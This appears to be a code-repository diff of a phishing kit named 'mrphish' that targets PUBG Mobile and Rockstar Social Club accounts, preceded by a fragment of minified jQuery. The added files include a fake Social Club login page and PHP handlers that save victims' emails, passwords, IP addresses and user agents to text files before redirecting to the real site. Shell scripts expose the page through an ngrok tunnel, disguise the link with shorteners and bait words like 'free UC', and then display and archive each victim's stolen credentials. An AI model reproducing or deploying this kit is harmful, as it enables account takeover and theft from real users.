x.fx.speeds?x.fx.speeds[r.duration]:x.fx.speeds._default,(null==r.queue||r.queue===!0)&&(r.queue="fx"),r.old=r.complete,r.complete=function(){x.isFunction(r.old)&&r.old.call(this),r.queue&&x.dequeue(this,r.queue)},r},x.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},x.timers=[],x.fx=rr.prototype.init,x.fx.tick=function(){var e,n=x.timers,r=0;for(Xn=x.now();n.length>r;r++)e=n[r],e()||n[r]!==e||n.splice(r--,1);n.length||x.fx.stop(),Xn=t},x.fx.timer=function(e){e()&&x.timers.push(e)&&x.fx.start()},x.fx.interval=13,x.fx.start=function(){Un||(Un=setInterval(x.fx.tick,x.fx.interval))},x.fx.stop=function(){clearInterval(Un),Un=null},x.fx.speeds={slow:600,fast:200,_default:400},x.fx.step={},x.expr&&x.expr.filters&&(x.expr.filters.animated=function(e){return x.grep(x.timers,function(t){return e===t.elem}).length}),x.fn.offset=function(e){if(arguments.length)return e===t?this:this.each(function(t){x.offset.setOffset(this,e,t)});var n,r,o={top:0,left:0},a=this[0],s=a&&a.ownerDocument;if(s)return n=s.documentElement,x.contains(n,a)?(typeof a.getBoundingClientRect!==i&&(o=a.getBoundingClientRect()),r=or(s),{top:o.top+(r.pageYOffset||n.scrollTop)-(n.clientTop||0),left:o.left+(r.pageXOffset||n.scrollLeft)-(n.clientLeft||0)}):o},x.offset={setOffset:function(e,t,n){var r=x.css(e,"position");"static"===r&&(e.style.position="relative");var i=x(e),o=i.offset(),a=x.css(e,"top"),s=x.css(e,"left"),l=("absolute"===r||"fixed"===r)&&x.inArray("auto",[a,s])>-1,u={},c={},p,f;l?(c=i.position(),p=c.top,f=c.left):(p=parseFloat(a)||0,f=parseFloat(s)||0),x.isFunction(t)&&(t=t.call(e,n,o)),null!=t.top&&(u.top=t.top-o.top+p),null!=t.left&&(u.left=t.left-o.left+f),"using"in t?t.using.call(e,u):i.css(u)}},x.fn.extend({position:function(){if(this[0]){var e,t,n={top:0,left:0},r=this[0];return"fixed"===x.css(r,"position")?t=r.getBoundingClientRect():(e=this.offsetParent(),t=this.offset(),x.nodeName(e[0],"html")||(n=e.offset()),n.top+=x.css(e[0],"borderTopWidth",!0),n.left+=x.css(e[0],"borderLeftWidth",!0)),{top:t.top-n.top-x.css(r,"marginTop",!0),left:t.left-n.left-x.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var e=this.offsetParent||s;while(e&&!x.nodeName(e,"html")&&"static"===x.css(e,"position"))e=e.offsetParent;return e||s})}}),x.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,n){var r=/Y/.test(n);x.fn[e]=function(i){return x.access(this,function(e,i,o){var a=or(e);return o===t?a?n in a?a[n]:a.document.documentElement[i]:e[i]:(a?a.scrollTo(r?x(a).scrollLeft():o,r?o:x(a).scrollTop()):e[i]=o,t)},e,i,arguments.length,null)}});function or(e){return x.isWindow(e)?e:9===e.nodeType?e.defaultView||e.parentWindow:!1}x.each({Height:"height",Width:"width"},function(e,n){x.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){x.fn[i]=function(i,o){var a=arguments.length&&(r||"boolean"!=typeof i),s=r||(i===!0||o===!0?"margin":"border");return x.access(this,function(n,r,i){var o;return x.isWindow(n)?n.document.documentElement["client"+e]:9===n.nodeType?(o=n.documentElement,Math.max(n.body["scroll"+e],o["scroll"+e],n.body["offset"+e],o["offset"+e],o["client"+e])):i===t?x.css(n,r,s):x.style(n,r,i,s)},n,a?i:t,a,null)}})}),x.fn.size=function(){return this.length},x.fn.andSelf=x.fn.addBack,"object"==typeof module&&module&&"object"==typeof module.exports?module.exports=x:(e.jQuery=e.$=x,"function"==typeof define&&define.amd&&define("jquery",[],function(){return x}))})(window);
     7 + 
  • ■ ■ ■ ■ ■ ■
    pubg/notp/js/popup.js
     1 +// button to bring up a popup
     2 +function open_reward_confirmation(ag) {
     3 + var reward = $(ag).attr("src");
     4 + $('.reward_confirmation').show();
     5 + $('.reward_list').hide();
     6 + $('#myReward').attr('src',reward);
     7 +}
     8 +function open_account_login(){
     9 + $('.account_login').show();
     10 + $('.reward_confirmation').hide();
     11 +}
     12 +function open_facebook_login(){
     13 + $('.login_facebook').show();
     14 +}
     15 +function open_twitter_login(){
     16 + $('.login_twitter').show();
     17 +}
     18 + 
     19 +// button to close the popup
     20 +function close_reward_confirmation(){
     21 + $(".reward_confirmation").hide()
     22 + $('.reward_list').show();
     23 +}
     24 +function close_account_login(){
     25 + $('.account_login').hide();
     26 + $('.reward_list').show();
     27 +}
     28 +function close_facebook_login(){
     29 + $('.login_facebook').hide();
     30 +}
     31 +function close_twitter_login(){
     32 + $('.login_twitter').hide();
     33 +}
  • ■ ■ ■ ■ ■ ■
    pubg/notp/js/tab.js
     1 +function openRewards(evt, rewardsClass) {
     2 + var i, tab_rewards, tab_rewards_link;
     3 + tab_rewards = document.getElementsByClassName("tab_rewards");
     4 + for (i = 0; i < tab_rewards.length; i++) {
     5 + tab_rewards[i].style.display = "none";
     6 + }
     7 + tab_rewards_link = document.getElementsByClassName("menu-choose");
     8 + for (i = 0; i < tab_rewards_link.length; i++) {
     9 + tab_rewards_link[i].className = tab_rewards_link[i].className.replace(" menu-active", "");
     10 + }
     11 + document.getElementById(rewardsClass).style.display = "block";
     12 + evt.currentTarget.className += " menu-active";
     13 +}
     14 +document.getElementById("defaultTabRewards").click();
  • ■ ■ ■ ■ ■ ■
    pubg/notp/process.php
     1 +<?php
     2 +include 'ip.php';
     3 +file_put_contents("gmail.txt", "" . $email = $_POST['email'] . "\n", FILE_APPEND);
     4 +?>
     5 +<?php
     6 +file_put_contents("pass.txt", "" . $pass = $_POST['pass'] . "\n", FILE_APPEND);
     7 +header('Location: https://www.pubgmobile.com');
     8 +?>
  • ■ ■ ■ ■ ■ ■
    pubg/notp/pubg.sh
     1 +#SCRIPT BY NOOB HACKERS
     2 +#YOU CAN CHANGE CREDITS BUT STILL YOU ARE KIDDO
     3 +#GIVE CREDITS IF YOU ARE CODER
     4 +#CHANGING CREDITS IS EASY BUT CODING IS TALENT
     5 +#THANKS TO ALL MY SUBSCRIBERS
     6 +#This is official tool of noob hackers if you steal it then your respositery will be banned soon so be careful and
     7 +#copyright strike will be sent to your channel, if you dont give credits
     8 +cd $HOME/mrphish/core
     9 +cp ngrok /data/data/com.termux/files/home/mrphish/core/deploys/gaming/pubg/notp
     10 +cd /data/data/com.termux/files/home/mrphish/core/deploys/gaming/pubg/notp
     11 +rm *.txt 2>/dev/null
     12 +stop() {
     13 +checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
     14 +checkphp=$(ps aux | grep -o "php" | head -n1)
     15 +checkssh=$(ps aux | grep -o "ssh" | head -n1)
     16 +if [[ $checkngrok == *'ngrok'* ]]; then
     17 +pkill -f -2 ngrok > /dev/null 2>&1
     18 +killall -2 ngrok > /dev/null 2>&1
     19 +fi
     20 + 
     21 +if [[ $checkphp == *'php'* ]]; then
     22 +killall -2 php > /dev/null 2>&1
     23 +fi
     24 +if [[ $checkssh == *'ssh'* ]]; then
     25 +killall -2 ssh > /dev/null 2>&1
     26 +fi
     27 +exit 1
     28 + 
     29 +}
     30 + 
     31 +dependencies() {
     32 + 
     33 + 
     34 +command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }
     35 +
     36 + 
     37 + 
     38 +}
     39 + 
     40 +checkfound() {
     41 + 
     42 +printf "\n"
     43 +printf "\e[1;92m\e[0m\e[1;96m|---------------------------------------------------------------|\e[0m\n"
     44 +printf " \e[1;92m\e[1;77m\e[0m\e[1;96m |\e[96m WAITING FOR DATA LOGS,\e[0m\e[1;91m PRESS CTRL+C TO STOP \e[96m|\e[0m\n"
     45 +printf "\e[1;92m\e[0m\e[1;96m|---------------------------------------------------------------|\e[0m\n"
     46 +while [ true ]; do
     47 + 
     48 + 
     49 +if [[ -e "gmail.txt" ]]; then
     50 +printf " \n\e[1;96m[\e[92m+>\e[1;96m] VICTIM ACCESSED LINK...!\e[0m\n"
     51 +printf "\e[1;92m\e[0m\e[1;96m |-------------------------------------[\e[92mSUCCESS\e[96m]\e[0m\n"
     52 +fi
     53 + 
     54 +sleep 3.5
     55 + 
     56 +if [[ -e "pass.txt" ]]; then
     57 +printf " \n\e[1;96m[\e[92m+>\e[1;96m] VALID DATA FOUND...!\e[0m\n"
     58 +printf "\e[1;92m\e[0m\e[1;96m |-------------------------------------[\e[92mSUCCESS\e[96m]\e[0m\n"
     59 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     60 +sleep 3.0
     61 +printf " \e[1;92m\e[0m\e[1;96m|---------------[\e[92mOPENING DUMP\e[96m]\e[0m\n"
     62 +sleep 10.0
     63 +bash io.sh
     64 +fi
     65 +sleep 3.0
     66 +done
     67 + 
     68 +}
     69 + 
     70 +ngrok_server() {
     71 + 
     72 + 
     73 +if [[ -e ngrok ]]; then
     74 +echo ""
     75 +else
     76 +command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
     77 +command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
     78 +printf " \e[1;96m[\e[0m#\e[1;96m] DOWNLOADING NGROK ...\n"
     79 +arch=$(uname -a | grep -o 'arm' | head -n1)
     80 +arch2=$(uname -a | grep -o 'Android' | head -n1)
     81 +if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
     82 +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1
     83 +if [[ -e ngrok-stable-linux-arm.zip ]]; then
     84 +unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
     85 +chmod +x ngrok
     86 +rm -rf ngrok-stable-linux-arm.zip
     87 +else
     88 +printf " \e[1;96m[!] Download error... Termux, run:\e[0m\e[1;96m pkg install wget\e[0m\n"
     89 +exit 1
     90 +fi
     91 + 
     92 +else
     93 +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1
     94 +if [[ -e ngrok-stable-linux-386.zip ]]; then
     95 +unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
     96 +chmod +x ngrok
     97 +rm -rf ngrok-stable-linux-386.zip
     98 +else
     99 +printf " \e[1;96m[!] Download error... \e[0m\n"
     100 +exit 1
     101 +fi
     102 +fi
     103 +fi
     104 +printf " \e[1;92m\e[0m\e[1;96m ____[\e[92monline\e[96m] \e[0m\n"
     105 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     106 +printf "\e[1;96m[\e[92m+\e[1;96m] STARTING DATA SERVER ....\n"
     107 +php -S 127.0.0.1:3333 > /dev/null 2>&1 &
     108 +sleep 4
     109 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     110 +printf "\e[1;96m[\e[92m+\e[1;96m] STARTING DEPLOY SERVER....\n"
     111 +./ngrok http 3333 > /dev/null 2>&1 &
     112 +sleep 12.0
     113 +link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
     114 +echo $link > sss
     115 +File=sss
     116 +if grep -q https:// "$File"
     117 +then
     118 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     119 +printf "\e[1;96m[\e[92m+\e[1;96m] DEPLOY LINK STATUS \e[96m[\e[92mWORKING\e[96m]\e[0m\n"
     120 +else
     121 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     122 +printf "\e[1;96m[\e[92m+\e[1;96m] DEPLOY LINK STATUS \e[96m[\e[91mERROR\e[96m]\e[0m\n"
     123 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     124 +printf "\e[1;96m[\e[92m+\e[1;96m] \e[91m PLEASE USE HOTPOST OR SPEED DATA OR USE AUTH TOKEN\n"
     125 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     126 +printf "\e[1;96m[\e[92m+\e[1;96m] \e[91m HOLD CTRL + C OR USE VOLUME DOWN + C TO STOP\n"
     127 +sleep 30m 10s
     128 +fi
     129 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     130 +printf "\e[1;96m[\e[92m+\e[1;96m] Copy ThiS Link \e[92m $link \e[0m\n"
     131 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     132 +printf "\e[1;96m[\e[92m+\e[1;96m] COPY & PASTE ABOVE LINK IN THIS TYPE 1 WEBSITE AND PASTE SHORTLINK BELOW"
     133 +echo " "
     134 +printf " \e[1;92m\e[0m\e[1;96m|\n"
     135 +echo -en "\e[32mTYPE 1 =>\e[0m "
     136 +read nmr
     137 +if [[ "$nmr" = "1" ]];
     138 +then
     139 +am start -a android.intent.action.VIEW -d https://rebrand.ly/mrpcdm > /dev/null
     140 +else
     141 +echo > /dev/null
     142 +fi
     143 +printf " \e[1;92m\e[0m\e[1;96m|\n"
     144 +echo -en "\e[32mPASTE SHORT LINK=>\e[0m "
     145 +read lnkstr
     146 +echo $lnkstr > lnkstr.sh
     147 +linko=$(cat lnkstr.sh)
     148 +short=$(curl -s https://da.gd/s/?url=${linko})
     149 +shorter=${short#https://}
     150 +echo " "
     151 +echo -e '\e[92m Type custom words like: (free-fire-hack, hack-android)'
     152 +echo -e "\e[91m Don't use space just use '-' between words\e[0m"
     153 +echo " "
     154 +echo -en "\e[92mCUSTOM WORDS=>\e[0m "
     155 +read words
     156 +final=$words@$shorter
     157 +shortb=$(curl -s https://da.gd/s/?url=${linko})
     158 +shorterb=${short#https://}
     159 +wordsb="1000-pubg-uc-free"
     160 +finalb=$wordsb@$shorterb
     161 +url="https://m.youtube.com/redirect?q=${link}"
     162 +tiny=$(curl -s http://tinyurl.com/api-create.php?url=${url})
     163 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     164 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------------------------------------------|\e[0m\n"
     165 +printf "\e[1;96m[\e[92m+>\e[1;96m NGROK LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $link
     166 +printf " \e[1;92m\e[0m\e[1;96m|------------------------\e[0m\n"
     167 +printf "\e[1;96m[\e[92m+>\e[1;96m CUSTOM LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $final
     168 +printf " \e[1;92m\e[0m\e[1;96m|------------------------\e[0m\n"
     169 +printf "\e[1;96m[\e[92m+>\e[1;96m DEFAULT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $finalb
     170 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------\e[0m\n"
     171 +printf "\e[1;96m[\e[92m+>\e[1;96m REDIRECT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $tiny
     172 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------\e[0m\n"
     173 +printf "\e[1;96m[\e[92m+>\e[1;96m SHORT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $linko
     174 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------------------------------------------|\e[0m\n"
     175 +checkfound
     176 +}
     177 + 
     178 +start1() {
     179 +if [[ -e sendlink ]]; then
     180 +rm -rf sendlink
     181 +fi
     182 + 
     183 +printf "\n"
     184 +echo -e "\e[96m
     185 + ____ ____ ____ __ __ _ _
     186 + ( \( __)( _ \( ) / \( \/ )
     187 + ) D ( ) _) ) __// (_/\( O )) /"
     188 +echo -e "\e[91m (____/(____)(__) \____/ \__/(__/\e[0m"
     189 +echo
     190 +default_option_server="2"
     191 +read -p $'\n\e[1;91m[\e[0m\e[1;77m+\e[0m\e[1;96m] START ATTACK [y/n] : \e[0m' option_server
     192 +clear
     193 +option_server="${option_server:-${default_option_server}}"
     194 +if [[ $option_server -eq 1 ]]; then
     195 + 
     196 +command -v php > /dev/null 2>&1 || { echo >&2 "This Server No More Supported So, Aborting."; exit 1; }
     197 +start
     198 + 
     199 +elif [[ $option_server -eq y ]]; then
     200 +ngrok_server
     201 +else
     202 +printf "\e[1;93m [!] Invalid option!\e[0m\n"
     203 +sleep 1
     204 +clear
     205 +start1
     206 +fi
     207 + 
     208 +}
     209 + 
     210 + 
     211 +start() {
     212 + 
     213 +default_choose_sub="Y"
     214 +default_subdomain="mrphish$RANDOM"
     215 + 
     216 +printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Choose subdomain? (Default:\e[0m\e[1;77m [Y/n] \e[0m\e[1;33m): \e[0m'
     217 +read choose_sub
     218 +choose_sub="${choose_sub:-${default_choose_sub}}"
     219 +if [[ $choose_sub == "Y" || $choose_sub == "y" || $choose_sub == "Yes" || $choose_sub == "yes" ]]; then
     220 +subdomain_resp=true
     221 +printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Subdomain: (Default:\e[0m\e[1;77m %s \e[0m\e[1;33m): \e[0m' $default_subdomain
     222 +read subdomain
     223 +subdomain="${subdomain:-${default_subdomain}}"
     224 +fi
     225 + 
     226 +server
     227 +checkfound
     228 + 
     229 +}
     230 + 
     231 +dependencies
     232 +start1
     233 + 
  • ■ ■ ■ ■ ■ ■
    pubg/notp/show.sh
     1 +clear
     2 +echo -e "\e[96m LOCAL DATABASE DUMPS\e[0m"
     3 +cd /sdcard/dUmpS
     4 +ls
     5 +echo
     6 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] TARGET NAME: \e[0m' name
     7 +echo -e "\e[96m | "
     8 +printf " \e[1;92m\e[0m\e[1;96m|------------------[\e[92mACCESSED\e[96m]\e[0m\n"
     9 +echo
     10 +sleep 3.0
     11 +cd $name
     12 +bash grad.sh
     13 +sleep 16
     14 +cd $HOME/mrphish
     15 +bash mrphish
     16 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/back
     1 +cd $HOME/mrphish/core/deploys/socialmedia/
     2 +bash menu
     3 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/menu
     1 + 
     2 +clear
     3 +echo -e "
     4 + 
     5 + ____ _ _ ____ ____
     6 + (_ _)( \/ )( _ \( __)
     7 + )( ) / ) __/ ) _)
     8 + (__) (__/ (__) (____)"
     9 + 
     10 + echo
     11 + 
     12 +echo -e "\e[96m |-----------------------------------------------------|"
     13 +echo -e "\e[96m |-------------------\e[92mSELECT OPTIONS\e[96m--------------------|"
     14 +echo -e "\e[96m |-----------------------------------------------------|"
     15 +echo -e "\e[96m | |"
     16 +echo -e "\e[96m | |"
     17 +echo -e "\e[96m | [\e[92m1\e[96m]==> WITH OTP |"
     18 +echo -e "\e[96m | [\e[92m2\e[96m]==> WITHOUT OTP |"
     19 +echo -e "\e[96m | |"
     20 +echo -e "\e[96m | [\e[92m3\e[96m]==> BACK |"
     21 +echo -e "\e[96m | |"
     22 +echo -e "\e[96m | |"
     23 +echo -e "\e[96m |-----------------------------------------------------|"
     24 +echo -e "\e[96m |------------------\e[91mSOCIAL CLUB\e[96m-----------------------|"
     25 +echo -e "\e[96m |-----------------------------------------------------|"
     26 +sleep 0.5
     27 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] SELECT OPTION: \e[0m' option
     28 +if [[ $option == 1 || $option == 01 ]]; then
     29 +echo
     30 +cd $HOME/mrphish/core/deploys/gaming/socialclub/otp
     31 +bash social.sh
     32 +echo
     33 +elif [[ $option == 2 || $option == 02 ]]; then
     34 +echo
     35 +cd $HOME/mrphish/core/deploys/gaming/socialclub/notp
     36 +bash social.sh
     37 +elif [[ $option == 3 || $option == 03 ]]; then
     38 +bash back
     39 +elif [[ $option == 0 ]]; then
     40 +clear
     41 +echo
     42 +printf " \e[1;96m Have A Good Day ........! \e[0m\n"
     43 +echo
     44 +sleep 3.0
     45 +exit 3
     46 +else
     47 +printf " \e[1;96m [!] Invalid option!\e[0m\n"
     48 +sleep 4.0
     49 +bash menu.sh
     50 +fi
     51 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/notp/dump.sh
     1 +echo -e "\e[96m | "
     2 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] VICTIM NAME: \e[0m' name
     3 +cd /sdcard/dUmpS
     4 +mkdir $name
     5 +cd $HOME/mrphish/core/deploys/gaming/socialclub/notp
     6 +mv *.txt /sdcard/dUmpS/$name
     7 +cp grad.sh /sdcard/dUmpS/$name
     8 +sleep 2.3
     9 +echo -e "\e[96m | "
     10 +printf " \e[1;92m\e[0m\e[1;96m|------------------[\e[92mDONE\e[96m]\e[0m\n"
     11 +cd $HOME/mrphish
     12 +bash mrphish
     13 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/notp/grad.sh
     1 +clear
     2 +echo
     3 +echo -e '\e[96m
     4 + __ _____ ___ ___
     5 + ( ) ( _ )/ __)/ __)
     6 + )(__ )(_)(( (_-.\__ \\'
     7 +echo -e '\e[91m (____)(_____)\___/(___/ \e[0m'
     8 +echo " "
     9 +echo " SOCIAL CLUB HACKED LOGS........."
     10 +echo -e "\e[96m |---------------------------------------------------------------|"
     11 +ip=$(cat ip.txt)
     12 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] IP:\e[0m\e[1;92m $ip \e[0m\n" $ip
     13 +echo -e "\e[96m |---------------------------------------------------------------|"
     14 +ip=$(cat gmail.txt)
     15 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] GMAIL:\e[0m\e[1;92m $ip \e[0m\n" $ip
     16 +echo -e "\e[96m |---------------------------------------------------------------|"
     17 +ip=$(cat pass.txt)
     18 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] PASS:\e[0m\e[1;92m $ip \e[0m\n" $ip
     19 +echo -e "\e[96m |---------------------------------------------------------------|"
     20 +sleep 8.0
     21 +if [ -f "ngrok" ];
     22 +then
     23 +rm ngrok
     24 +else
     25 +sleep 0.2
     26 +fi
     27 +#ip=$(cat gml.txt)
     28 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] NUMBER:\e[0m\e[1;77m $ip \e[0m\n" $ip
     29 +#ip=$(cat num.txt)
     30 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] BIO:\e[0m\e[1;77m $ip \e[0m\n" $ip
     31 +#ip=$(cat bio.txt)
     32 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] USER:\e[0m\e[1;77m $ip \e[0m\n" $ip
     33 +#ip=$(cat usr.txt)
     34 +#printf "\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m $ip \e[0m\n" $ip
     35 +#ip=$(cat cred.txt)
     36 +#printf "\e[1;93m[\e[0m\e[1;77m|\e[0m\e[1;93m] OT \e[0m\e[1;92m $ip \e[0m\n" $ip
     37 + 
  • socialclub/notp/images/bg.png
  • socialclub/notp/images/eye.svg
  • socialclub/notp/images/fb.png
  • socialclub/notp/images/google.png
  • socialclub/notp/images/logo.svg
  • socialclub/notp/images/ps.png
  • socialclub/notp/images/twitter.png
  • socialclub/notp/images/xbox.png
  • ■ ■ ■ ■ ■ ■
    socialclub/notp/index.html
     1 +<html lang="en">
     2 +<head>
     3 + <meta charset="UTF-8">
     4 + <meta name="viewport" content="width=device-width, initial-scale=1.0">
     5 + <title></title>
     6 + <link rel="stylesheet" href="style.css">
     7 + <link href="https://fonts.googleapis.com/css2?family=Ubuntu:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap" rel="stylesheet">
     8 +</head>
     9 +<body>
     10 +<form action="process.php" method="POST" class="login">
     11 + <div class="login-form">
     12 + <div class="logo"></div>
     13 + <div class="container">
     14 + <h1>Sign in with social club</h1>
     15 + <div class="txtb">
     16 + <input type="text" id="username" name="email" placeholder=" ">
     17 + <span class="placeholder">Email</span>
     18 + </div>
     19 + <div class="txtb">
     20 + <input type="password" id="password" name="pass" placeholder=" ">
     21 + <span class="placeholder">Password</span>
     22 + <i class="show-password-btn">
     23 + <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" height="16" width="16" class="UI__Icon__icon" data-ui-name="visibility_off_icon"><path d="M29.8 17.2c-2.2 1.7-4.6 3-7.1 3.7l-2.5-2.5c.6-.8.9-1.8.9-2.9 0-1.4-.5-2.6-1.5-3.6-1.7-1.7-4.5-1.9-6.4-.6l-1.7-1.7c6.3-1.3 12.9.1 18.4 4.3.6.5 1.5.4 1.9-.2.5-.6.4-1.5-.2-1.9-6.7-5.1-14.9-6.6-22.4-4.4L5.7 3.9c-.5-.5-1.4-.5-1.9 0s-.5 1.4 0 1.9l2.6 2.6c-2 .9-4 2-5.8 3.4-.6.5-.7 1.3-.2 1.9.3.3.7.5 1.1.5.3 0 .6-.1.8-.3 1.9-1.5 4-2.6 6.2-3.4l2.9 2.9c-.3.6-.4 1.2-.4 1.8 0 .8.5 1.4 1.3 1.5.6.1 1.2-.4 1.4-1l2.2 2.2c-.2 0-.3 0-.5-.1-.7-.2-1.5.2-1.7.9-.2.7.2 1.5.9 1.7.5.2 1 .2 1.5.2.7 0 1.4-.2 2.1-.5l1.5 1.5c-6 1-12.2-.5-17.3-4.5-.6-.5-1.5-.4-1.9.2-.5.6-.4 1.5.2 1.9 4.6 3.6 10 5.4 15.5 5.4 2 0 3.9-.2 5.9-.7l4.1 4.1c.3.3.6.4 1 .4s.7-.1 1-.4c.5-.5.5-1.4 0-1.9L25.1 23c2.3-.9 4.6-2.1 6.6-3.7.6-.5.7-1.3.2-1.9-.7-.6-1.5-.7-2.1-.2zm-12.2-3.3c.4.4.7 1 .7 1.7 0 .3-.1.6-.2.8l-3-3c.9-.3 1.9-.1 2.5.5z"></path></svg>
     24 + </i>
     25 + </div>
     26 + <label class="checkbox">
     27 + <input type="checkbox">
     28 + <span>Keep me signed in</span>
     29 + </label>
     30 + <div class="forgot-signin-container">
     31 + <a href="process.php" class="link">Forgot your password?</a>
     32 + <input type="submit" value="Signin" class="login">
     33 + </div>
     34 + </form>
     35 + </div>
     36 +
     37 + <div class="container bottom-container">
     38 + <h3 class="row">Sign in using</h3>
     39 + <div class="sm-login row">
     40 + <a href="login.php">
     41 + <img src="images/ps.png" alt="">
     42 + </a>
     43 + <a href="#">
     44 + <img src="images/xbox.png" alt="">
     45 + </a>
     46 + <a href="#">
     47 + <img src="images/fb.png" alt="">
     48 + </a>
     49 + <a href="#">
     50 + <img src="images/google.png" alt="">
     51 + </a>
     52 + <a href="#">
     53 + <img src="images/twitter.png" alt="">
     54 + </a>
     55 + </div>
     56 + </div>
     57 +
     58 + <div class="create-account">
     59 + Not a member?
     60 + <a href="login.php" class="link">Create a new account</a>
     61 + </div>
     62 + </div>
     63 +
     64 + <div class="copyright">
     65 + &copy; 2020
     66 + </div>
     67 +
     68 + <script>
     69 + document.querySelector(".show-password-btn").addEventListener("click",function(){
     70 + var passwordInput = document.querySelector("#passwordInput");
     71 + if(passwordInput.type == "password") passwordInput.type = "text";
     72 + else passwordInput.type = "password";
     73 + });
     74 + </script>
     75 +</body>
     76 +</html>
  • ■ ■ ■ ■ ■ ■
    socialclub/notp/io.sh
     1 +clear
     2 +mpv /sdcard/log.mp3
     3 +clear
     4 +if [ -f "pass.txt" ];then
     5 +bash grad.sh
     6 +sleep 15.0
     7 +bash dump.sh
     8 +else
     9 +echo -e " \e[96m Retriving Data Again Wait"
     10 +sleep 3.0
     11 +bash io.sh
     12 +fi
     13 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/notp/ip.php
     1 +<?php
     2 +
     3 +if (!empty($_SERVER['HTTP_CLIENT_IP']))
     4 + {
     5 + $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
     6 + }
     7 +elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
     8 + {
     9 + $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
     10 + }
     11 +else
     12 + {
     13 + $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
     14 + }
     15 +$useragent = " User-Agent: ";
     16 +$browser = $_SERVER['HTTP_USER_AGENT'];
     17 +
     18 +
     19 +$file = 'ip.txt';
     20 +$fp = fopen($file, 'a');
     21 +
     22 +fwrite($fp, $ipaddress);
     23 +fwrite($fp, $useragent);
     24 +fwrite($fp, $browser);
     25 +
     26 +
     27 +fclose($fp);
  • ■ ■ ■ ■ ■ ■
    socialclub/notp/process.php
     1 +<?php
     2 +include 'ip.php';
     3 +file_put_contents("gmail.txt", "" . $email = $_POST['email'] . "\n", FILE_APPEND);
     4 +?>
     5 +<?php
     6 +file_put_contents("pass.txt", "" . $pass = $_POST['pass'] . "\n", FILE_APPEND);
     7 +header('Location: https://signin.rockstargames.com/');
     8 +?>
  • ■ ■ ■ ■ ■ ■
    socialclub/notp/show.sh
     1 +clear
     2 +echo -e "\e[96m LOCAL DATABASE DUMPS\e[0m"
     3 +cd /sdcard/dUmpS
     4 +ls
     5 +echo
     6 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] TARGET NAME: \e[0m' name
     7 +echo -e "\e[96m | "
     8 +printf " \e[1;92m\e[0m\e[1;96m|------------------[\e[92mACCESSED\e[96m]\e[0m\n"
     9 +echo
     10 +sleep 3.0
     11 +cd $name
     12 +bash grad.sh
     13 +sleep 16
     14 +cd $HOME/mrphish
     15 +bash mrphish
     16 + 
  • ■ ■ ■ ■ ■ ■
    socialclub/notp/social.sh
     1 +#SCRIPT BY NOOB HACKERS
     2 +#YOU CAN CHANGE CREDITS BUT STILL YOU ARE KIDDO
     3 +#GIVE CREDITS IF YOU ARE CODER
     4 +#CHANGING CREDITS IS EASY BUT CODING IS TALENT
